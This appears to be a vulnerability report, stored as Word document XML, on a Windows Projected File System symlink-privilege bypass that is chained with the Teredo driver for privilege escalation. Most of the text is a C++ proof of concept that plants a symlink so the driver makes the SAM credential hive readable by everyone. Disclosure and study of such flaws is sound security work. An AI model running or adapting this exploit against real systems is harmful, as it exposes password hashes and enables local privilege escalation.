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12" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tqze6xxn5sc" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Projected File System - NTFS symlink mitigation bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w41j70mv5g8f" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Teredo driver - EOP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Projected File System enables virtualization of files and folder giving programmatic control over its content.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It is possible to request the driver to create NTFS symbolic links by using PrjWritePlaceholderInfo2 - when using that functionality the requirement of having the SeCreateSymbolicLinkPrivilege privilege can be bypassed.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https://docs.microsoft.com/en-us/windows/win32/api/projectedfslib/nf-projectedfslib-prjwriteplaceholderinfo2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 the attached POC I create a symbolic link to redirect a temporary file created by the teredo driver to an alternative data stream om the sam file.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727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By linking to a non existing alternative data stream teredo is able to create a new stream, therefore continuing to set an ACL granting EVERYBODY read access.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As the ACL on the alternative data stream also applies to the main file stream the result is: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4291013" cy="290083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1013" cy="29008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Relevant source code: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&lt;exploitLib/exploitLib.h&gt;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&lt;exploitLib/primitives.h&gt;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"projfs.h"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using namespace x::literalNS;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int main(int argc, const char* args[])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try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try { x::file{ "%WINDIR%\\temp\\teredo.txt"_p,FILE_GENERIC_WRITE,FILE_OPEN_REPARSE_POINT,FILE_OPEN }.deleteFile(); }   catch (...) {};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x::file tmpFolder{ "%TEMP%"_p / x::guid::random_guid() , FILE_READ_ATTRIBUTES,FILE_DIRECTORY_FILE };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virtualRoot vroot{ tmpFolder.getFinalPath() };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vroot.makeSymlink("temp", "C:\\Windows\\System32\\config\\SAM:qqq", false);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x::file{ tmpFolder / "temp"_p, DELETE,FILE_OPEN_REPARSE_POINT }.rename("%WINDIR%\\temp\\teredo.txt"_p);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x::process::ShellExecuteW(L"netsh", L"interface teredo show state");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return 0;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catch (wil::ResultException&amp; e)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std::wcout &lt;&lt; _com_error{ (HRESULT)RtlNtStatusToDosError(e.GetErrorCode()) }.ErrorMessage() &lt;&lt; std::endl;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std::wcout &lt;&lt; e.what() &lt;&lt; std::endl;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catch (std::exception&amp; e)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std::wcout &lt;&lt; e.what() &lt;&lt; std::endl;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struct  virtualRoot {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PRJ_NAMESPACE_VIRTUALIZATION_CONTEXT _instanceHandle = nullptr;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x::strpath folder;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virtualRoot(x::strpath folder) : folder{ folder } {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GUID instanceId;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auto pathHash = x::unistr{ folder }.md5hash();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auto folderGuid = x::guid{ x::unistr{ L"{%c%c%c%c%c%c%c%c-%c%c%c%c-%c%c%c%c-%c%c%c%c-%c%c%c%c%c%c%c%c%c%c%c%c}" }.format('a' , 'a' ,  'a' ,  'a' ,pathHash.at(0),                                  pathHash.at(1), pathHash.at(2), pathHash.at(4), pathHash.at(5), pathHash.at(6), pathHash.at(7), pathHash.at(8), pathHash.at(9),                                         pathHash.at(10), pathHash.at(11), pathHash.at(12), pathHash.at(13), pathHash.at(14), pathHash.at(15),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             pathHash.at(16),'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f','f','f','f','f','f').c_str()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};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try { x::file{ folder ,FILE_WRITE_ATTRIBUTES ,FILE_OPEN_REPARSE_POINT }.delete_reparse_point(IO_REPARSE_TAG_PROJFS); }      catch (...) {}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THROW_IF_FAILED(PrjMarkDirectoryAsPlaceholder(folder.c_str(), nullptr, nullptr, folderGuid));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PRJ_STARTVIRTUALIZING_OPTIONS _options = {};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PRJ_NOTIFICATION_MAPPING notificationMappings[1] = {};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notificationMappings[0].NotificationRoot = L"";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notificationMappings[0].NotificationBitMask = PRJ_NOTIFY_FILE_OPENED | PRJ_NOTIFY_NEW_FILE_CREATED | PRJ_NOTIFY_FILE_OVERWRITTEN | PRJ_NOTIFY_PRE_DELETE</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|PRJ_NOTIFY_PRE_RENAME | PRJ_NOTIFY_PRE_SET_HARDLINK | PRJ_NOTIFY_FILE_RENAMED | PRJ_NOTIFY_HARDLINK_CREATED | PRJ_NOTIFY_FILE_HANDLE_CLOSED_NO_MODIFICATION | PRJ_NOTIFY_FILE_HANDLE_CLOSED_FILE_MODIFIED | PRJ_NOTIFY_FILE_HANDLE_CLOSED_FILE_DELETED | PRJ_NOTIFY_FILE_PRE_CONVERT_TO_FULL;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PRJ_STARTVIRTUALIZING_OPTIONS opts = {};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opts.NotificationMappings = notificationMappings;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opts.NotificationMappingsCount = 16;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PRJ_CALLBACKS _callbacks = {};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// Register the required C callbacks.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_callbacks.StartDirectoryEnumerationCallback = StartDirEnumCallback_C;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_callbacks.EndDirectoryEnumerationCallback = EndDirEnumCallback_C;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_callbacks.GetDirectoryEnumerationCallback = GetDirEnumCallback_C;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_callbacks.GetPlaceholderInfoCallback = GetPlaceholderInfoCallback_C;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_callbacks.GetFileDataCallback = GetFileDataCallback_C;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_callbacks.NotificationCallback = NotificationCallback_C;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_callbacks.QueryFileNameCallback = QueryFileName_C;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_callbacks.CancelCommandCallback = CancelCommand_C;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THROW_IF_FAILED(PrjStartVirtualizing(folder.c_str(), &amp;_callbacks, nullptr, nullptr, &amp;_instanceHandle));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}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~virtualRoot() {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try {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PrjStopVirtualizing(_instanceHandle);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} catch (...) {}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try { x::file{ folder ,FILE_WRITE_ATTRIBUTES ,FILE_OPEN_REPARSE_POINT }.delete_reparse_point(IO_REPARSE_TAG_PROJFS); } catch (...) {}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}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void makeSymlink(x::strpath name, x::strpath destination, bool dir = false )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{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PRJ_PLACEHOLDER_INFO     placeholderInfo = {};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placeholderInfo.FileBasicInfo.IsDirectory = dir;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placeholderInfo.FileBasicInfo.FileSize = 0;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PRJ_EXTENDED_INFO  ex{ };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ex.InfoType = PRJ_EXT_INFO_TYPE::PRJ_EXT_INFO_TYPE_SYMLINK;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ex.Symlink.TargetName = destination;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ex.NextInfoOffset = 0;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PrjWritePlaceholderInfo2( _instanceHandle, name, &amp;placeholderInfo, sizeof(placeholderInfo), &amp;ex );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}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microsoft.com/en-us/windows/win32/api/projectedfslib/nf-projectedfslib-prjwriteplaceholderinfo2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